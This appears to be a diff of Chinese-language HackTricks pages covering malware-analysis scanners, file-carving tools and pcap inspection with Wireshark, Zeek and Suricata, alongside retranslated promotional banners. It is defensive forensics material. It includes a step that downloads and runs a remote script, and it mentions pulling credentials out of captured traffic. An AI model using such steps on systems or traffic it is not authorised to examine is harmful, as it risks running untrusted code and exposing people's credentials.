学习和实践GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,18 +1,19 @@
|
|||
# 恶意软件分析
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## 取证备忘单
|
||||
|
||||
|
@ -36,8 +37,8 @@ sudo apt-get install -y yara
|
|||
```
|
||||
#### 准备规则
|
||||
|
||||
使用此脚本从 github 下载并合并所有 yara 恶意软件规则:[https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
|
||||
创建 _**rules**_ 目录并执行该脚本。这将创建一个名为 _**malware\_rules.yar**_ 的文件,其中包含所有恶意软件的 yara 规则。
|
||||
使用此脚本从 github 下载并合并所有 yara 恶意软件规则: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
|
||||
创建名为 _**rules**_ 的目录并执行该脚本。这将创建一个名为 _**malware\_rules.yar**_ 的文件,其中包含所有恶意软件的 yara 规则。
|
||||
```bash
|
||||
wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
|
||||
mkdir rules
|
||||
|
@ -69,7 +70,7 @@ clamscan folderpath #Scan the whole folder
|
|||
```
|
||||
### [Capa](https://github.com/mandiant/capa)
|
||||
|
||||
**Capa**检测可执行文件中的潜在恶意功能:PE、ELF、.NET。因此,它会发现诸如Att\&ck战术或可疑功能,例如:
|
||||
**Capa**检测可执行文件中的潜在恶意**功能**:PE、ELF、.NET。因此,它将查找诸如Att\&ck战术或可疑功能,例如:
|
||||
|
||||
- 检查OutputDebugString错误
|
||||
- 作为服务运行
|
||||
|
@ -80,14 +81,14 @@ clamscan folderpath #Scan the whole folder
|
|||
### IOCs
|
||||
|
||||
IOC表示威胁指标。IOC是一组**用于识别**一些潜在不受欢迎的软件或已确认**恶意软件**的条件。蓝队使用这种定义来在其**系统**和**网络**中**搜索此类恶意文件**。\
|
||||
共享这些定义非常有用,因为当在计算机中识别恶意软件并为该恶意软件创建IOC时,其他蓝队可以使用它更快地识别恶意软件。
|
||||
共享这些定义非常有用,因为当在计算机中识别出恶意软件并为该恶意软件创建了一个IOC时,其他蓝队可以使用它更快地识别出恶意软件。
|
||||
|
||||
创建或修改IOC的工具是[**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**。**\
|
||||
您可以使用诸如[**Redline**](https://www.fireeye.com/services/freeware/redline.html)之类的工具在设备中**搜索定义的IOC**。
|
||||
创建或修改IOCs的工具是[**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**。**\
|
||||
您可以使用诸如[**Redline**](https://www.fireeye.com/services/freeware/redline.html)之类的工具在设备中**搜索定义的IOCs**。
|
||||
|
||||
### Loki
|
||||
|
||||
[**Loki**](https://github.com/Neo23x0/Loki)是一个用于简单威胁指标的扫描器。\
|
||||
[**Loki**](https://github.com/Neo23x0/Loki)是一个用于简单威胁指标的扫描程序。\
|
||||
检测基于四种检测方法:
|
||||
```
|
||||
1. File Name IOC
|
||||
|
@ -104,7 +105,7 @@ Compares process connection endpoints with C2 IOCs (new since version v.10)
|
|||
```
|
||||
### Linux 恶意软件检测
|
||||
|
||||
[**Linux 恶意软件检测 (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) 是一个针对 Linux 的恶意软件扫描器,采用 GNU GPLv2 许可发布,旨在解决共享托管环境中面临的威胁。它利用来自网络边缘入侵检测系统的威胁数据,提取正在攻击中使用的恶意软件,并生成用于检测的签名。此外,威胁数据还来自用户提交的数据,使用 LMD 结账功能以及恶意软件社区资源。
|
||||
[**Linux 恶意软件检测 (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) 是一个针对 Linux 的恶意软件扫描器,采用 GNU GPLv2 许可发布,旨在解决共享托管环境中面临的威胁。它利用来自网络边缘入侵检测系统的威胁数据,提取正在攻击中使用的恶意软件并生成用于检测的签名。此外,威胁数据还来自用户提交的具有 LMD 结帐功能和恶意软件社区资源。
|
||||
|
||||
### rkhunter
|
||||
|
||||
|
@ -114,7 +115,7 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk
|
|||
```
|
||||
### FLOSS
|
||||
|
||||
[**FLOSS**](https://github.com/mandiant/flare-floss) 是一个工具,将尝试使用不同的技术在可执行文件中查找混淆的字符串。
|
||||
[**FLOSS**](https://github.com/mandiant/flare-floss) 是一个工具,将尝试使用不同的技术来查找可执行文件中的混淆字符串。
|
||||
|
||||
### PEpper
|
||||
|
||||
|
@ -122,23 +123,23 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk
|
|||
|
||||
### PEstudio
|
||||
|
||||
[PEstudio](https://www.winitor.com/download) 是一个工具,可以获取 Windows 可执行文件的信息,如导入、导出、头部,还会检查病毒总数并查找潜在的 Att\&ck 技术。
|
||||
[PEstudio](https://www.winitor.com/download) 是一个工具,允许获取 Windows 可执行文件的信息,如导入、导出、头部,还会检查病毒总数并找到潜在的 Att\&ck 技术。
|
||||
|
||||
### Detect It Easy(DiE)
|
||||
|
||||
[**DiE**](https://github.com/horsicq/Detect-It-Easy/) 是一个工具,用于检测文件是否加密,并查找打包程序。
|
||||
[**DiE**](https://github.com/horsicq/Detect-It-Easy/) 是一个工具,用于检测文件是否**加密**,还可以找到**打包程序**。
|
||||
|
||||
### NeoPI
|
||||
|
||||
[**NeoPI**](https://github.com/CiscoCXSecurity/NeoPI) 是一个使用各种统计方法来检测文本/脚本文件中混淆和加密内容的 Python 脚本。NeoPI 的预期目的是帮助检测隐藏的 Web shell 代码。
|
||||
[**NeoPI**](https://github.com/CiscoCXSecurity/NeoPI) 是一个使用各种**统计方法**来检测文本/脚本文件中的**混淆**和**加密**内容的 Python 脚本。NeoPI 的预期目的是帮助**检测隐藏的 Web shell 代码**。
|
||||
|
||||
### **php-malware-finder**
|
||||
|
||||
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) 尽最大努力检测混淆/可疑代码以及使用 PHP 函数的文件,这些函数通常在恶意软件/webshell 中使用。
|
||||
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) 尽最大努力检测**混淆**/**可疑代码**以及使用**经常用于** **恶意软件**/**Web shell** 的 **PHP** 函数的文件。
|
||||
|
||||
### Apple 二进制签名
|
||||
|
||||
在检查一些恶意软件样本时,您应始终检查二进制文件的签名,因为签署它的开发人员可能已与恶意软件相关联。
|
||||
在检查一些**恶意软件样本**时,您应始终检查二进制文件的签名,因为签名的**开发人员**可能已与**恶意软件**有关。
|
||||
```bash
|
||||
#Get signer
|
||||
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"
|
||||
|
@ -157,7 +158,7 @@ spctl --assess --verbose /Applications/Safari.app
|
|||
|
||||
### 基线
|
||||
|
||||
如果文件夹中的文件**不应该被修改**,你可以计算文件夹中**原始文件**的**哈希值**,并将其与**当前文件**进行**比较**。任何被修改的内容都会**引起怀疑**。
|
||||
如果文件夹的文件**不应该被修改**,你可以计算文件夹中**原始文件**的**哈希值**,并将其与**当前文件**进行**比较**。任何被修改的内容都会**引起怀疑**。
|
||||
|
||||
### 统计分析
|
||||
|
||||
|
|
|
@ -1,28 +1,29 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
- 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github 仓库提交 PR 来分享黑客技巧。**
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# 数据碎片重组工具
|
||||
|
||||
## Autopsy
|
||||
|
||||
在取证中最常用的用于从图像中提取文件的工具是[**Autopsy**](https://www.autopsy.com/download/)。下载、安装并让其摄取文件以查找“隐藏”文件。请注意,Autopsy专为支持磁盘映像和其他类型的映像构建,而不是简单文件。
|
||||
在取证中用于从图像中提取文件的最常用工具是[**Autopsy**](https://www.autopsy.com/download/)。下载、安装并让其摄取文件以查找“隐藏”文件。请注意,Autopsy 专为支持磁盘映像和其他类型的映像构建,而不是简单文件。
|
||||
|
||||
## Binwalk <a id="binwalk"></a>
|
||||
|
||||
**Binwalk**是一种用于搜索二进制文件(如图像和音频文件)中嵌入文件和数据的工具。
|
||||
可以使用`apt`安装,但是[源代码](https://github.com/ReFirmLabs/binwalk)可以在github上找到。
|
||||
**Binwalk** 是一种用于搜索二进制文件(如图像和音频文件)中嵌入文件和数据的工具。
|
||||
可以使用 `apt` 安装,但[源代码](https://github.com/ReFirmLabs/binwalk)可在 github 上找到。
|
||||
**有用的命令**:
|
||||
```bash
|
||||
sudo apt install binwalk #Insllation
|
||||
|
@ -32,7 +33,7 @@ binwalk --dd ".*" file #Displays and extracts all files from the given file
|
|||
```
|
||||
## Foremost
|
||||
|
||||
另一个常用的查找隐藏文件的工具是**foremost**。您可以在`/etc/foremost.conf`中找到foremost的配置文件。如果您只想搜索一些特定文件,请取消注释。如果您不取消注释任何内容,foremost将搜索其默认配置的文件类型。
|
||||
另一个常用的查找隐藏文件的工具是 **foremost**。您可以在 `/etc/foremost.conf` 中找到 foremost 的配置文件。如果您只想搜索一些特定文件,请取消注释。如果您不取消任何注释,foremost 将搜索其默认配置的文件类型。
|
||||
```bash
|
||||
sudo apt-get install foremost
|
||||
foremost -v -i file.img -o output
|
||||
|
@ -47,19 +48,19 @@ scalpel file.img -o output
|
|||
```
|
||||
## Bulk Extractor
|
||||
|
||||
这个工具包含在kali中,但你也可以在这里找到它: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk_extractor)
|
||||
这个工具包含在kali中,但你也可以在这里找到它:[https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk_extractor)
|
||||
|
||||
这个工具可以扫描一个镜像,并且会**提取其中的pcaps**,**网络信息(URLs, domains, IPs, MACs, mails)**以及更多**文件**。你只需要执行以下操作:
|
||||
这个工具可以扫描一个镜像,并且会**提取其中的pcaps**,**网络信息(URLs、域名、IP地址、MAC地址、邮件)**以及更多**文件**。你只需要执行以下操作:
|
||||
```text
|
||||
bulk_extractor memory.img -o out_folder
|
||||
```
|
||||
浏览工具收集的**所有信息**(密码?),**分析**数据包(阅读[**Pcaps分析**](../pcap-inspection/)),搜索**奇怪的域名**(与**恶意软件**或**不存在**相关的域名)。
|
||||
浏览工具收集的**所有信息**(密码?),分析**数据包**(阅读[**Pcaps分析**](../pcap-inspection/)),搜索**奇怪的域名**(与**恶意软件**或**不存在**相关的域名)。
|
||||
|
||||
## PhotoRec
|
||||
|
||||
您可以在[https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk_Download)找到它。
|
||||
|
||||
它带有GUI和CLI版本。您可以选择要让PhotoRec搜索的**文件类型**。
|
||||
它带有GUI和CLI版本。您可以选择要PhotoRec搜索的**文件类型**。
|
||||
|
||||
![](../../../.gitbook/assets/image%20%28524%29.png)
|
||||
|
||||
|
@ -74,4 +75,4 @@ bulk_extractor memory.img -o out_folder
|
|||
# 附加工具
|
||||
|
||||
您可以使用[**viu**](https://github.com/atanunq/viu)在终端中查看图像。
|
||||
您可以使用Linux命令行工具**pdftotext**将PDF转换为文本并阅读它。
|
||||
您可以使用Linux命令行工具**pdftotext**将pdf转换为文本并阅读它。
|
||||
|
|
|
@ -1,33 +1,34 @@
|
|||
# Pcap 检查
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS 红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持 HackTricks 的其他方式:
|
||||
|
||||
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFT**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live) 上**关注**我们。
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来**分享**您的黑客技巧。
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**RootedCON**](https://www.rootedcon.com/) 是西班牙最重要的网络安全活动之一,也是欧洲最重要的活动之一。作为促进技术知识的使命,这个大会是技术和网络安全专业人士在各个领域的热点交流会。
|
||||
[**RootedCON**](https://www.rootedcon.com/) 是西班牙最重要的网络安全活动之一,也是欧洲最重要的之一。作为促进技术知识的使命,这个大会是技术和网络安全专业人士在各个领域的热点会议。
|
||||
|
||||
{% embed url="https://www.rootedcon.com/" %}
|
||||
|
||||
{% hint style="info" %}
|
||||
关于 **PCAP** 和 **PCAPNG** 的说明:PCAP 文件格式有两个版本;**PCAPNG 是较新的版本,不是所有工具都支持**。您可能需要使用 Wireshark 或其他兼容工具将文件从 PCAPNG 转换为 PCAP,以便在其他工具中使用。
|
||||
关于 **PCAP** 与 **PCAPNG** 的说明:PCAP 文件格式有两个版本;**PCAPNG 是较新的版本,不是所有工具都支持**。您可能需要使用 Wireshark 或其他兼容工具将文件从 PCAPNG 转换为 PCAP,以便在其他工具中使用。
|
||||
{% endhint %}
|
||||
|
||||
## 用于 pcap 的在线工具
|
||||
|
||||
* 如果您的 pcap 文件头部**损坏**,您应该尝试使用以下工具**修复**:[http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)
|
||||
* 在 [**PacketTotal**](https://packettotal.com) 中提取 pcap 中的**信息**并搜索**恶意软件**
|
||||
* 如果您的 pcap 文件头部**损坏**,您应该尝试使用以下链接进行**修复**:[http://f00l.de/hacking/**pcapfix.php**](http://f00l.de/hacking/pcapfix.php)
|
||||
* 在 [**PacketTotal**](https://packettotal.com) 中提取**信息**并搜索 pcap 中的**恶意软件**
|
||||
* 使用 [**www.virustotal.com**](https://www.virustotal.com) 和 [**www.hybrid-analysis.com**](https://www.hybrid-analysis.com) 搜索**恶意活动**
|
||||
|
||||
## 提取信息
|
||||
|
@ -37,10 +38,10 @@
|
|||
### Wireshark
|
||||
|
||||
{% hint style="info" %}
|
||||
**如果您要分析 PCAP,基本上必须了解如何使用 Wireshark**
|
||||
**如果您要分析 PCAP 文件,基本上必须了解如何使用 Wireshark**
|
||||
{% endhint %}
|
||||
|
||||
您可以在以下位置找到一些 Wireshark 技巧:
|
||||
您可以在以下链接找到一些 Wireshark 技巧:
|
||||
|
||||
{% content-ref url="wireshark-tricks.md" %}
|
||||
[wireshark-tricks.md](wireshark-tricks.md)
|
||||
|
@ -48,7 +49,7 @@
|
|||
|
||||
### Xplico 框架
|
||||
|
||||
[**Xplico** ](https://github.com/xplico/xplico)_(仅适用于 Linux)_ 可以**分析** pcap 并从中提取信息。例如,Xplico 可从 pcap 文件中提取每封电子邮件(POP、IMAP 和 SMTP 协议)、所有 HTTP 内容、每个 VoIP 通话(SIP)、FTP、TFTP 等。
|
||||
[**Xplico** ](https://github.com/xplico/xplico)_(仅限 Linux)_ 可以**分析** pcap 并从中提取信息。例如,Xplico 可从 pcap 文件中提取每封电子邮件(POP、IMAP 和 SMTP 协议)、所有 HTTP 内容、每个 VoIP 通话(SIP)、FTP、TFTP 等。
|
||||
|
||||
**安装**
|
||||
```bash
|
||||
|
@ -69,7 +70,7 @@ sudo apt-get install xplico
|
|||
### NetworkMiner
|
||||
|
||||
与Xplico一样,这是一个用于**分析和提取pcap文件中对象的工具**。它有一个免费版本,您可以[**在这里下载**](https://www.netresec.com/?page=NetworkMiner)。它适用于**Windows**。\
|
||||
这个工具还可以用来从数据包中获取**其他信息的分析**,以便更快地了解发生了什么。
|
||||
这个工具还可以用来从数据包中**分析其他信息**,以便更快地了解发生了什么。
|
||||
|
||||
### NetWitness Investigator
|
||||
|
||||
|
@ -91,13 +92,13 @@ capinfos capture.pcap
|
|||
```
|
||||
### Ngrep
|
||||
|
||||
如果你想在 pcap 文件中查找某些内容,可以使用 ngrep。以下是使用主要过滤器的示例:
|
||||
如果你想在 pcap 文件中查找某些内容,可以使用 **ngrep**。以下是使用主要过滤器的示例:
|
||||
```bash
|
||||
ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.168 and src host 192.168"
|
||||
```
|
||||
### 数据恢复
|
||||
|
||||
使用常见的数据恢复技术可以从 pcap 中提取文件和信息:
|
||||
使用常见的数据恢复技术可以帮助从 pcap 中提取文件和信息:
|
||||
|
||||
{% content-ref url="../partitions-file-systems-carving/file-data-carving-recovery-tools.md" %}
|
||||
[file-data-carving-recovery-tools.md](../partitions-file-systems-carving/file-data-carving-recovery-tools.md)
|
||||
|
@ -105,7 +106,7 @@ ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192.
|
|||
|
||||
### 捕获凭据
|
||||
|
||||
您可以使用类似 [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) 的工具来解析 pcap 或实时接口中的凭据。
|
||||
您可以使用类似 [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) 这样的工具来解析从 pcap 或实时接口中提取的凭据。
|
||||
|
||||
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -132,15 +133,15 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
|
|||
|
||||
[**YaraPCAP**](https://github.com/kevthehermit/YaraPcap) 是一个工具,可以:
|
||||
|
||||
- 读取 PCAP 文件并提取 Http 流。
|
||||
- 对任何压缩流进行 gzip 解压缩。
|
||||
- 使用 yara 扫描每个文件。
|
||||
- 写入 report.txt。
|
||||
- 可选择将匹配的文件保存到一个目录中。
|
||||
* 读取 PCAP 文件并提取 Http 流。
|
||||
* 对任何压缩流进行 gzip 解压缩。
|
||||
* 使用 yara 扫描每个文件。
|
||||
* 写入 report.txt。
|
||||
* 可选择将匹配的文件保存到一个目录中。
|
||||
|
||||
### 恶意软件分析
|
||||
|
||||
检查是否能找到任何已知恶意软件的指纹:
|
||||
检查是否可以找到任何已知恶意软件的指纹:
|
||||
|
||||
{% content-ref url="../malware-analysis.md" %}
|
||||
[malware-analysis.md](../malware-analysis.md)
|
||||
|
@ -150,9 +151,7 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log
|
|||
|
||||
> [Zeek](https://docs.zeek.org/en/master/about.html) 是一个被动的、开源的网络流量分析器。许多运营商将 Zeek 用作网络安全监视器(NSM),以支持对可疑或恶意活动的调查。Zeek 还支持广泛的流量分析任务,超出了安全领域,包括性能测量和故障排除。
|
||||
|
||||
基本上,由 `zeek` 创建的日志不是 **pcaps**。因此,您将需要使用 **其他工具** 来分析包含有关 **pcaps** 的信息的日志。
|
||||
|
||||
### 连接信息
|
||||
基本上,由 `zeek` 创建的日志不是 **pcaps**。因此,您将需要使用 **其他工具** 来分析包含有关 pcaps 的 **信息** 的日志。
|
||||
```bash
|
||||
#Get info about longest connections (add "grep udp" to see only udp traffic)
|
||||
#The longest connection might be of malware (constant reverse shell?)
|
||||
|
@ -219,7 +218,7 @@ cat dns.log | zeek-cut qtype_name | sort | uniq -c | sort -nr
|
|||
#See top DNS domain requested with rita
|
||||
rita show-exploded-dns -H --limit 10 zeek_logs
|
||||
```
|
||||
## 其他pcap分析技巧
|
||||
## 其他 pcap 分析技巧
|
||||
|
||||
{% content-ref url="dnscat-exfiltration.md" %}
|
||||
[dnscat-exfiltration.md](dnscat-exfiltration.md)
|
||||
|
@ -237,20 +236,21 @@ rita show-exploded-dns -H --limit 10 zeek_logs
|
|||
|
||||
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**RootedCON**](https://www.rootedcon.com/) 是**西班牙**最重要的网络安全活动之一,也是**欧洲**最重要的之一。以**促进技术知识**为使命,这个大会是技术和网络安全专业人士在各个领域的热点会议。
|
||||
[**RootedCON**](https://www.rootedcon.com/) 是**西班牙**最重要的网络安全活动之一,也是**欧洲**最重要的之一。以**促进技术知识**为使命,这个大会是技术和网络安全专业人士在各个领域的热点交流会。
|
||||
|
||||
{% embed url="https://www.rootedcon.com/" %}
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并实践 AWS 黑客技能:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并实践 GCP 黑客技能:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF版本的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
